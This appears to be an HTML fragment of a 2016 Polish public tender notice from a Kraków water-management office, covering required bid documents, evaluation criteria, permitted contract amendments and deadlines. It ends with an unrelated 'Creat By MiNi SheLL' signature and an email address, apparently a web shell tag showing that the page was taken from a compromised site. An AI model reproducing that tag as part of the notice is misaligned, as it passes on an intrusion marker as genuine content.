<p>1.Wypełniony Formularz Oferty 2. Dokument ustanawiający Pełnomocnika do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego - w przypadku, gdy Wykonawcy składają wspólną ofertę, 3. Stosowne pełnomocnictwo(a) potwierdzające, że dana osoba nie wymieniona w dokumencie rejestracyjnym prowadzonej działalności jest upoważniona do reprezentowania wykonawcy w postępowaniu. 4. Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia w sytuacji polegania przez Wykonawcę na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów 4.1. oświadczenie innego podmiotu o braku podstaw do wykluczenia z postępowania z powodu nie spełniania warunków, o których mowa w art. 24 ust. 1 Ustawy, zgodnie z drukiem stanowiącym załącznik do SIWZ; 4.2.dla weryfikacji osoby (reprezentacji) innego podmiotu podpisującej zobowiązanie aktualny odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.5.kosztorys ofertowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - warunki płatności - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany i uzupełnienia umowy mogą być dokonywane wyłącznie w formie pisemnego aneksu, podpisanego przez obie strony. 2. Z zastrzeżeniem formy przewidzianej w ust.1, Strony dopuszczają możliwość zmiany treści umowy w następującym zakresie: a) zmiany w KRS, wpisie do ewidencji działalności gospodarczej lub (CEIDG) w trakcie realizacji zamówienia. b) zmiany kont bankowych, c) wystąpienie oczywistych omyłek pisarskich i rachunkowych w treści umowy. d) w przypadku ustawowej zmiany stawki podatku od towarów i usług na przedmiot umowy, cena brutto określona w umowie ulegnie odpowiedniej zmianie, przy czym cena netto pozostanie niezmieniona e) zmiany terminu wykonania umowy z zastrzeżeniem ust. 3 3. Zmiana terminów wykonania przedmiotu zamówienia będzie możliwa wyłącznie w przypadku zdarzeń losowych tj. podtopienia terenu robót, spowodowanego powodzią lub intensywnymi opadami deszczu tylko jeśli uniemożliwia to prowadzenie robót, bądź też wystąpienia innych okoliczności niezależnych od wykonawcy i udokumentowanych w formie pisemnej a mających wpływ na termin realizacji przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mziuw.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MZMiUW Inspektorat Rejonowy w Krakowie ul.Kraszewskiego 36 30-110 Kraków pokój 32A..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.08.2016 godzina 08:00, miejsce: MZMiUW Inspektorat Rejonowy w Krakowie ul.Kraszewskiego 36 30-110 Kraków pokój 32A..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com